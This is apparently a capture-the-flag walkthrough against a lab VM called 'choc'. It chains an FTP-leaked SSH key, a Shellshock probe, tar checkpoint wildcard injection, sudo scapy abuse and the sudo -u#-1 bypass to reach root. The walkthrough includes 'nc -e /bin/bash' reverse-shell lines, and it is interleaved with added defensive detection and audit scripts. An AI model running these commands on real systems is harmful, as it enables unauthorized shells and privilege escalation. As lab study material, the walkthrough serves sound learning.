The target IP is 192.168.56.124.

Port scan

sudo nmap --min-rate 10000 -p- 192.168.56.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 09:25 UTC
Nmap scan report for 192.168.56.124 (192.168.56.124)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
MAC Address: 08:00:27:24:ED:C3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.17 seconds

sudo nmap -sT -sV -sC -O -p21,22 192.168.56.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 09:30 UTC
Nmap scan report for 192.168.56.124 (192.168.56.124)
Host is up (0.00025s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 1811 Apr 20 2021 id_rsa [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:66:48:ee:7b:a9:ef:e1:20:26:c5:a8:bf:c5:4d:5c (RSA)
| 256 80:46:cd:47:a1:ce:a7:fe:56:36:4f:f7:d1:ed:92:c0 (ECDSA)
|_ 256 a2:83:db:7a:7d:38:70:e6:00:16:71:29:ee:04:73:aa (ED25519)
MAC Address: 08:00:27:24:ED:C3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

Anonymous FTP login yields a private key (id_rsa). I had planned to brute-force its passphrase, but it turned out to have none.

Base64-decoding the private key reveals the username and host at its end: carl@choc.
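The comment sits inside the openssh-key-v1 container, which is why it appears once the base64 body is decoded. The following parser is an added example, not part of the original writeup: it reads the container header to tell whether a key is passphrase-protected (cipher "none" means it is not, which is what an auditor checks when keys turn up on a world-readable share) and, for unencrypted RSA or Ed25519 keys, walks past the private numbers to the comment field. build_sample_key is constructed test data with placeholder numbers, not a real key.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"
PEM_HEAD = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_TAIL = "-----END OPENSSH PRIVATE KEY-----"


def _read_string(buf, off):
    """Read one SSH 'string' (uint32 big-endian length, then bytes) at offset off."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + n], off + n


def _string(b):
    return struct.pack(">I", len(b)) + b


def _mpint(i):
    # SSH mpint: big-endian two's complement, so keep a leading zero byte if the high bit is set
    return _string(i.to_bytes((i.bit_length() + 8) // 8, "big"))


def parse_openssh_private_key(pem):
    """Return cipher/kdf, whether the key is passphrase-protected and (for unencrypted RSA or
    Ed25519 keys) the key type and the comment stored after the private numbers."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if lines[0] != PEM_HEAD or lines[-1] != PEM_TAIL:
        raise ValueError("not an OpenSSH private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("missing openssh-key-v1 magic")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    _pub, off = _read_string(blob, off)
    priv, off = _read_string(blob, off)
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(), "encrypted": cipher != b"none",
            "nkeys": nkeys, "key_type": None, "comment": None}
    if info["encrypted"]:
        return info  # the private section is ciphertext; the comment is inside it
    p = 8  # skip the two identical checkint fields
    ktype, p = _read_string(priv, p)
    info["key_type"] = ktype.decode()
    # string fields that precede the comment: RSA n,e,d,iqmp,p,q ; Ed25519 pk,sk
    nfields = {"ssh-rsa": 6, "ssh-ed25519": 2}.get(info["key_type"])
    if nfields is not None:
        for _ in range(nfields):
            _, p = _read_string(priv, p)
        comment, p = _read_string(priv, p)
        info["comment"] = comment.decode()
    return info


def build_sample_key(comment, encrypted=False):
    """Constructed test data: a structurally valid openssh-key-v1 container whose RSA numbers are
    meaningless placeholders, not a real key. With encrypted=True only the header differs, which
    is enough to exercise the passphrase check."""
    ktype = b"ssh-rsa"
    pub = _string(ktype) + _mpint(65537) + _mpint(0x1234567)
    priv = struct.pack(">II", 0xDEADBEEF, 0xDEADBEEF) + _string(ktype)
    for v in (0x1234567, 65537, 0x12345, 0x123, 0x3, 0x5):  # placeholder n,e,d,iqmp,p,q
        priv += _mpint(v)
    priv += _string(comment.encode())
    pad = 1
    while len(priv) % 8:  # block size 8 for cipher "none"
        priv += bytes([pad])
        pad += 1
    cipher, kdf = (b"aes256-ctr", b"bcrypt") if encrypted else (b"none", b"none")
    blob = (MAGIC + _string(cipher) + _string(kdf) + _string(b"") + struct.pack(">I", 1)
            + _string(pub) + _string(priv))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_HEAD}\n{body}\n{PEM_TAIL}\n"


if __name__ == "__main__":
    print(parse_openssh_private_key(build_sample_key("carl@choc")))
    print(parse_openssh_private_key(build_sample_key("carl@choc", encrypted=True)))
```

Pointed at a real key file, parse_openssh_private_key(open(path).read()) answers the two questions that matter for an exposed key: is it protected by a passphrase, and which account is it labelled for.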

But the connection is closed as soon as it is established; perhaps a script is blocking SSH logins.

ssh -i id_rsa carl@choc '() { : ;};echo vulnerable'

This confirms the Shellshock vulnerability, so set up a reverse shell.

There are also the users torki and sarah.

bash -version

The version is 4.3, which falls in the Shellshock-vulnerable range.
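What the probe above relies on is that a vulnerable bash imports any environment variable whose value begins with "() {" as a function and then executes whatever follows the closing "};". When sshd restricts a key to a forced command it still exports the client's command line as SSH_ORIGINAL_COMMAND, which is the likely path on this box (an assumption; the writeup does not show the authorized_keys entry). The detector below is an added example, not code from the original writeup: it flags such values in exported variables, extracts the trailing command so an analyst can see what was attempted, and runs the standard local self-test against the installed bash. The SAMPLE_EVENTS list is constructed.

```python
import os
import re
import subprocess

# A value a vulnerable bash would import as a function definition.
FUNC_DEF_RE = re.compile(r"^\s*\(\)\s*\{")
# The same, capturing whatever follows the function body's closing "};".
TRAILER_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;(?P<trailer>.*)$", re.S)


def is_shellshock_payload(value):
    return bool(FUNC_DEF_RE.match(value))


def payload_trailer(value):
    """The command text after the function body; empty if the value is not a payload."""
    m = TRAILER_RE.match(value)
    return m.group("trailer").strip() if m else ""


def scan_env_events(events):
    """events: (variable name, value) pairs as sshd or a web server would export them.
    Returns (name, trailing commands) for every value that would be parsed as a function."""
    return [(name, payload_trailer(value)) for name, value in events
            if is_shellshock_payload(value)]


def local_bash_vulnerable():
    """Standard self-test: a patched bash prints only 'test'; an unpatched one also prints
    'vulnerable'. Returns None when bash is not installed."""
    env = {"x": "() { :;}; echo vulnerable", "PATH": os.environ.get("PATH", "/usr/bin:/bin")}
    try:
        out = subprocess.run(["bash", "-c", "echo test"], env=env, capture_output=True,
                             text=True, timeout=5).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in out


# Constructed sample events: the writeup's own probe string, a benign web User-Agent, a
# User-Agent carrying the same function-definition prefix, and a benign forced command.
SAMPLE_EVENTS = [
    ("SSH_ORIGINAL_COMMAND", "() { : ;};echo vulnerable"),
    ("HTTP_USER_AGENT", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("HTTP_USER_AGENT", "() { :;}; /bin/bash -c 'id'"),
    ("SSH_ORIGINAL_COMMAND", "rsync --server --sender . /srv/data"),
]

if __name__ == "__main__":
    for name, trailer in scan_env_events(SAMPLE_EVENTS):
        print(f"{name}: function-definition payload, trailing command: {trailer!r}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

The version number alone is not a reliable verdict (distributions backported the fix without changing 4.3), so local_bash_vulnerable() is the check to trust on a host; the pattern match is what belongs in log review.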

A backup archive was found in /tmp; unpack it:

tar -xvf backup_home.tgz

It contains a diary.txt, whose meaning is unclear.

The secretgarden directory in torki's home holds an identical copy of that file, plus a backup script; my guess is that it backs up the contents of secretgarden into the archive under /tmp.

A scheduled task like this can basically be exploited with tar's checkpoint trick, and we have write permission in the secretgarden directory.

In /home/torki/secret_garden:

touch ./--checkpoint=1

echo 'nc -e /bin/bash 192.168.56.102 1234'>shell.sh

touch './--checkpoint-action=exec=sh shell.sh'

chmod +x shell.sh

Start a listener, and a shell as torki comes back.
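The checkpoint trick works only because the backup job lets the shell expand an unquoted * inside a directory that another user can write to; the names then reach tar as argv items that GNU getopt parses as options. The script below is an added example, not the box's backup script (which the writeup only guesses at); it assumes the cron job runs something like tar -czf /tmp/backup_home.tgz * inside the directory. It audits a directory for option-like names, shows the argv the job would actually have executed, and builds the hardened command line that file names cannot influence. demo() plants the same four constructed names the writeup creates, in a temporary directory.

```python
import os
import shlex
import tempfile


def option_like_names(directory):
    """Entries whose names begin with '-'. When a script runs `tar ... *` inside the directory,
    the shell expands '*' to these names and GNU tar parses them as options, not file operands."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def audit_backup_dir(directory):
    """Report option-like names and, specifically, any --checkpoint-action= entry, which would
    make tar run a command while archiving."""
    names = option_like_names(directory)
    return {"option_like": names,
            "checkpoint_action": [n for n in names if n.startswith("--checkpoint-action=")]}


def expanded_tar_argv(archive, directory):
    """The argv `tar -czf ARCHIVE *` becomes after shell expansion inside `directory` (sorted
    the way a C-locale shell sorts a glob). Shown to explain the audit; never executed here."""
    return ["tar", "-czf", archive] + sorted(os.listdir(directory))


def safe_tar_argv(archive, directory):
    """A backup command line that file names cannot influence: change to the parent directory
    and archive the directory by name, with '--' ending option parsing before the operand."""
    parent, base = os.path.split(directory.rstrip("/"))
    return ["tar", "-czf", archive, "-C", parent or ".", "--", base]


def demo():
    """Constructed directory holding the four names the writeup plants; returns the audit
    result and the argv the cron job would have seen."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("diary.txt", "shell.sh", "--checkpoint=1",
                     "--checkpoint-action=exec=sh shell.sh"):
            open(os.path.join(d, name), "w").close()
        return audit_backup_dir(d), expanded_tar_argv("/tmp/backup_home.tgz", d)


if __name__ == "__main__":
    report, argv = demo()
    print("audit:", report)
    print("what the job ran:", shlex.join(argv))
    print("hardened form:   ",
          shlex.join(safe_tar_argv("/tmp/backup_home.tgz", "/home/torki/secret_garden")))
```

The hardened form also removes the second precondition: because the archive is created from the parent directory, the job no longer needs to run inside a directory the backed-up user controls. Prefixing every operand with ./ (tar -czf ARCHIVE ./*) is the other common fix; either way, the audit function is what to run against directories that privileged cron jobs read.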

/usr/local/bin/sudo -l
User torki may run the following commands on choc:
(sarah) NOPASSWD: /usr/bin/scapy
/usr/local/bin/sudo -u sarah /usr/bin/scapy
os.system('nc -e /bin/bash 192.168.56.102 1235')

Now we are sarah. Her home directory contains .note with fuckmeplease, which is sarah's password.

sudo -l
User sarah may run the following commands on choc:
!root NOPASSWD: /usr/bin/wall

It cannot be run as root, but the sudo 1.8.27 - Security Bypass applies here (presumably every version before 1.8.27 works too); it bypasses the !root restriction.

The wall command can then be used to read arbitrary files.

sudo -u#-1 wall --nobanner "/root/.ssh/id_rsa"
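The rule that fell here is one that names who may not be impersonated instead of who may. As an added example, not code from the writeup, the audit below parses sudo -l output for Runas lists that rely on "!" negation and, given the first line of sudo --version ("Sudo version X.Y.Z"), reports whether the installed sudo predates 1.8.28, the release in which that negation began to hold against the -u#-1 form. The two sudo -l samples are reproduced from the writeup's output with sudo's usual indentation restored; the version strings are constructed.

```python
import re

# `sudo --version` prints "Sudo version X.Y.Z" on its first line.
SUDO_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")
# One rule line of `sudo -l` output: an optional "(runas list)", an optional PASSWD/NOPASSWD
# tag, then an absolute command path.
ENTRY_RE = re.compile(r"^\s*\(?(?P<runas>[^)]*?)\)?\s+(?P<rest>(?:(?:NO)?PASSWD:\s*)?/\S.*)$")
# First release in which a Runas negation such as "!root" is enforced against "-u#-1" IDs.
FIXED_IN = (1, 8, 28)

# Both outputs reproduced from the writeup above.
TORKI_SUDO_L = """User torki may run the following commands on choc:
    (sarah) NOPASSWD: /usr/bin/scapy
"""
SARAH_SUDO_L = """User sarah may run the following commands on choc:
    !root NOPASSWD: /usr/bin/wall
"""


def sudo_version(version_output):
    m = SUDO_VERSION_RE.search(version_output)
    return tuple(int(x) for x in m.groups()) if m else None


def negated_runas(runas):
    """Users excluded with '!' in a Runas list, e.g. 'ALL, !root' -> ['root']."""
    return [t.strip()[1:] for t in runas.split(",") if t.strip().startswith("!")]


def audit_sudo_l(sudo_l_output, version_output):
    """Flag every rule whose Runas list relies on negation. Such rules are fragile in general
    and, on sudo older than 1.8.28, do not keep the excluded user out at all."""
    ver = sudo_version(version_output)
    findings = []
    for line in sudo_l_output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        excluded = negated_runas(m.group("runas"))
        if excluded:
            findings.append({
                "rule": line.strip(),
                "excluded_users": excluded,
                "negation_bypassable": ver is not None and ver < FIXED_IN,
                "fix": "allow-list the run-as users explicitly, e.g. (sarah), and upgrade sudo",
            })
    return findings


if __name__ == "__main__":
    for sample in (TORKI_SUDO_L, SARAH_SUDO_L):
        print(audit_sudo_l(sample, "Sudo version 1.8.27") or "no negated Runas rules")
```

The torki rule, (sarah) NOPASSWD: /usr/bin/scapy, is the shape to prefer: it enumerates the permitted target account, so there is nothing for an unusual user ID to slip past. Whether the command itself can be coerced into reading or executing things is a separate question that the audit does not answer.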

Save it locally as key, but the trailing spaces and tabs at the end of each line must be removed:

sed -i 's/[[:space:]]*$//' key

chmod 600 key

ssh -i key root@choc

Now we are root!